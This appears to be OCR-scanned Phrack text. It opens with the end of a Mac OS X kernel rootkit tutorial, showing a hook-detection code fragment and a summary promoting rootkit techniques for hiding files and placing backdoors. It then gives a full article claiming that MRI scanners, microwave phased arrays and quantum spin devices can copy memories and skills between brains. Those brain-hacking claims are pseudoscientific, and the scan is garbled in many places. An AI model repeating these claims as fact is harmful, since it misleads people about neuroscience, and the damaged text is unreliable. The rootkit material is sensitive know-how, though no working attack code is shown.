struct sysent *_sysent_from_ram; 
struct sysent *_sysent_from_hdd; 


_sysent_from_ram = (struct sysent *)get_sysent_from_ram(); 
_sysent_from_hdd = (struct sysent *)get_sysent_from_disk(); 


for (i = 0; i < 428; i++) { 
if (get_syscall_addr(i, _sysent_from_ram) != get_syscall_addr (i, 
_sysent_from_hdd) ) 
report_hooked_syscall (i); 
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Of course this method has it’s flaws. An attacker may manipulate the 
SYS_open syscall and redirect the call to a rogue copy of the kernel image 
if the file /mach_kernel is accessed. This can be overcome by always 
keeping a fresh and clean copy of the kernel image on a non-writable 
media. 


This method is also not capable of detecting inline function hooks in the 
system call handler functions, that’s a modification left as an exercise 
for the reader to implement. 


--[ 7 -— Summary 


Rootkits on Mac OS X is not a new topic, but not as well researched as 
i.e. rootkits on Windows or Linux. As we have shown, the techniques used 
is quite similar to the ones used on other unix-like operating systems. In 
addition to this OS X has some extra goodies, like the I/O Kit framework 
and the Mach API, that provides really useful features for people trying 
to subvert the XNU kernel. 


Manipulating syscalls, internal kernel structures and other parts of the 
XNU kernel is a great way to hide processes, files and folders and even to 
place backdoors accessible directly from userland. All this can be 
achieved using either a kernel extension or the Mach API, and if done 
right almost impossible to detect. Both techniques have different 
advantages and it’s up to you to choose which technique to use in your own 
rootkit. 


The purpose of this article was first and foremost to give a basic 
understanding of the subject and is intended as an entry level tutorial 
for anyone wishing to implement their own OS X kernel rootkit and we 
sincerely hope that it helped to shed some light on the subject. 
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==Phrack Inc.== 


Volume Ox0d, Issue 0x42, Phile #0x11 of Oxl1l 


[ How close are they of hacking your brain? ] 


[ by dahut ] 


[ dahut@skynet.be] 


A 


Since the invention of the EEG, S-F writers produced many books with 
stories about pumping out the content of your brain and putting it in 
another brain, or taking the control of your soul or willingness and 
driving you as a robot. We wil not talk about the well known MK-ULTRA 
project that never ended up on any real functioning device approaching 
this result. What they did reach is well described in the still suspicious 
book "Trance formation of America" (www.trance-formation.com). 


Our recent researched demonstrate however that it is possible that 
something is happening or close to. 


We will explain two different technologies, that can provide some 
breakthrough in the mind control. 


a= ls. MRE 


By enhancing the resolution of Magnetic Resonance Imagery device, w 
should be able to do nice things such putting ideas or remembering in the 
brain of someone. 


There are today multiples ways to measure brain activity. Brain activity 
is also brain content, to som xtent, depending what you are measuring 
and what you are looking for. 


he most advanced works achieved around what’s in the brain is the 
BlueBrain project, invented by Henry Markram at EPFL in Switzerland. His 
lab is using a 10.000 CPU Blue Gene type IBM supercomputer, and a super 
Silicon Graphic computer with 16 graphic cards and 64 Itanium 2 CPU to 
display processing results. He did start by making the inventory of all 
neurons types and response type, sorting out few tens types of each. Next 
he built devices to digitize the geometry of each type of neuron, 
following the path of dendrites and axons, branch by branch, stroke by 
stroke, change in diameter, etc. A typical neuron ends up with about 
10.000 XYZ 3D coordinates. Next, he packed 10.000 neurons of multiple 
types in a very narrow space; 5mm by 1mm. This is what scientists name a 
microcolumn of the neocortex. Then he put electrical input at the entry of 
the "network" and did a simulation, using the few tens of responses found 
in these neurons. The result is a modified electrical state of all these 
branches: 100 millions branches! Each one with a different electrical 
level. This density of neurons produces short circuits between each of 
them, the synapse. Such micro column can contains up to a trillion 
synapses! 


From a mechanical point of view, this is not anymore a network, this is a 
dense matter with different electrical level at each cubic 5 micron. You 
should see the neuronal network as the processing device of the I/O, when 
the remaining electrical levels are the memory of the 
events/habits/experiences. 


Now, let’s say that a lab can produce a MRI device with such resolution. 
It will measure th lectrical level each 5 micron, and do it fora 
specific area, let’s say to start easy, the area of both hands. Ok, we 
have to store few terabytes of data, a quite easy job today. 


Now, let’s take somebody, and put his head in another device, a three 
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dimensional phased array radar, or more precisely, a micro wave transducer 
(only the emitting part of the radar). This device can browse space 
without movement. By putting two perpendicular transducers next to the 
brain, they can send two beams in it, and where they cross, create an 
electrical pulse with an intensity equal to the sum of both beams, also 
equal to the original. 


Doing so, it’s possible with a super high resolution system, to pinpoint 
each cell that was acquired (peeked) in the "donor", and poke its value 
in the other brain. 


If the donor is a good violin player, the receiver, when waking up, will 
feel as if he has new hands, and be surprised how easy he can play violin 
(but maybe not Mozart yet). 


A step further, we can peek and poke other areas of the brain, like the 

one containing experience, skills, visual scenes. With this last example, 
a criminal or a suspect refusing to talk, can be peeked from the visual 
cortex, and the result can be poked in another brain. The receiver will 
"see" new scenes, and maybe the one of the crime. 


The better the resolution, the higher the resolution of the remembering. 


It’s not mandatory to match neuron by neuron, from the donor to the 
receiver, or stroke by stroke, or synapse by synapse. The density is so 
high that we can really see the memory inside the neocortex as being 
stored in a three dimensional matrix. Whatever the network, as soon as it 
is the area used to do a specific operation (see Broca’s areas) like 
hands, speech, vision, etc. the "knowledge" stored during years is stored 
as electrical levels in a matrix. The neuronal network will find back it’s 
way through the different channels of higher voltage poked in the matrix, 
reconnect instantaneously synapses to recreate missing bridges. 


--[ 2. Total Recall and Arnold Schwarzenegger are not so far! 
Here is a metaphor to better understand the concept: 


Think about a country: villages and inhabitants are there, connected with 
road networks. 


Move houses and inhabitants in another place, keeping topology. Wherever 
they end up, they will immediately recreate roads and path to reconnects 
all houses and building. Houses and inhabitants are our memory and skills, 
materialized by electrical levels. They don’t care about having to 
recreate roads and paths. They know where they want to go and which 
connections they need to do their work. The synaptic plasticity is even 
more wonderful than what you can imagine. Indeed, axons and dendrite can 
move as snakes to approach other neurons structure, and pop up synaptic 
connections everywhere they wan, and all of that in seconds! 


Basically, think about your brain being a computer. First neurons met by 
an external input are acting as your computer I/O unit; and A/D converter. 
These neurons are mostly in the internal side of the neocortex (inside the 
brain) .The neurons the are receiving the converted measures are th 
processing units, and the neurons receiving the results, have to send it 
to the muscles or some other parts of your body. In parallel, all neurons 
are storing what’s happening all the time, recording everything crossing 
them: this is our memory, a matrix parallel to our neuronal network, used 
for data storage an dnot directly related to our processing unit. 


The system described here above will not work to inject ideas in the 
brain, but just knowledge, remembering and skills. Producing ideas is 
something else, produced by consciousness, and this is a complete other 
story involving quantum physic. 


--[ 3. Quantum Physic 
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We are now entering in leading edge researches made by visionary 
scientists that are not always belonging to what we name the "Scientific 
paradigm", meaning that if they want to keep their annual funding, they 
should not investigate further these areas or stop to talk about what they 
are doing. We will present you some of their work and how they can hack 
your brain to the perfection. 


If you take a neuron, or even any living cell, you can find in all of 
them centriols and micro tubules. All are made of bi-state monomers 
molecules, able to take two states, alpha and beta, depending the quantum 
state of on of their component. Each molecule has a state but can switch 
to the other one for some still unknown reason. When all the molecules of 
one micro-tubule switch their state to the same one, the micro tubule 
becomes super conductive for light and some other waves. The change of 
state is due to one spinning particle that will collide the molecule and 
change the position of one its atom. These molecules have a size of 15nm. 
We need therefore a device able to send spinning particle in a brain with 
a resolution of maximum 15 nm to have a chance to make the atom turning 
the righ way. Hopefully, making an particle spinning left handed will 

make the molecule swapping to it’s L-associated state, or let’s say the 
alpha state. 


There are already labs device able to adjust and measure particle’s spin 
direction. Let’s imagine we make them in such a way that they can work on 
the brain a little bit like the MRI hacking machine. It will not be a 
device as with the 3D phased array system, but more a wave canon, 
adjusting the wave origin to match exactly the distance needed to act ona 
specific electron. The device will have to be highly accurate, and fast. 
We can think about minimum one million antennas in the device (don’t 
worry, they are used with such complexity). The device will process 
millimeter by millimeter of the neo cortex, and required about one minute 
to read or patch a square centimeter. Because its entire surface is 2.000 
square cm, the device will need about two days to hack a complete brain. 
Being not able to have an exact matching between both brains geometry is 
not a matter, for the same reason as with the MRI system. We can use, only 
here, the term of holographic memory, because what’s important is the 
spatial content, not the topological content. The brain network is so 
dense that it’s not a network anymore when you speak about storing 
information in it. It’s like house that are so dense that you can jump 
from one roof to the other, without going through the roads. So roads are 
used to process date coming from outside the village, and going outside 
the village, but if you stay in the village you don’t need roads at all. 


Now, let’s explain what’s the outcome of such blast in your brain. 


When you will wake up, after the long stay in the device, you will feel 
nothing new, because you are not yourself anymore, and you can’t remember 
your first life. The guy standing in front of you, coming from the other 
machine, the "donor", si now YOU, but with another body. You feel now as 
twins, you have the same rembering of your life, you think the same, you 
have exactly the same knowledge and intelligence. If he s sad, you are 
sad, if he is good, you are good, if he likes men, you will like men too. 


If he is a terrorist, you will behave like a terrorist. Nothing to learn 
anymore, everything is already in your brain. You know how to builda 
bomb, how to pilot an air plane, how to fights, etc. but if was peanut to 
train you, to convince you, to enroll you. Well, there is the cost of the 
brain device, not cheap at all, but they have the cash! 


You can also decide to copy only part of the brain, but it’s more risky 
because that’s a research area were we are not far, and it could be 
dangerous to outcome with overlapping memory, like, let’s say, the top of 
you wife, and the bottom of your "loved boyfriend"! 


Next day, think twice when waking up: are you still yourself? 


References: 
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